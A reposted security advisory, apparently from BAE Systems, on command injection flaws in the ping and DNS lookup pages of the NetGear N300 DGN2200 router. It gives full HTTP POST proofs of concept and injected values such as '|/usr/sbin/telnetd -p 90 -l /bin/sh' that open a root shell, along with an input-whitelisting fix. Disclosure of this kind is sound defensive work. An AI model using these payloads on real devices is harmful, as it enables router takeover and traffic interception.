NetGear N300 DGN2200多个安全漏洞(2)


Description
-----------
The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system  as the root user.


Proof of concept
----------------
Example exploitation to obtain a file and directory listing:

POST /ping.cgi HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Content-Length: 81
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YXBwbGU3ODE=
    Origin:
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

1. Send the following POST data:
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90


Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.')

3.  Blind Command Execution with DNS Lookup
===========================================

Requires
--------
Authenticated access to the web administration interface.


Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.


Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:

POST /dnslookup.cgi HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Content-Length: 32
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YXBwbGU3ODE=
    Origin:
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

host_name=|sleep 5&lookup=Lookup

To get an interactive shell,

1.  Send the following POST data:
hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
2.  Telnet to port 90

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/66210a44fb37e8f0727b488fcf93708a.html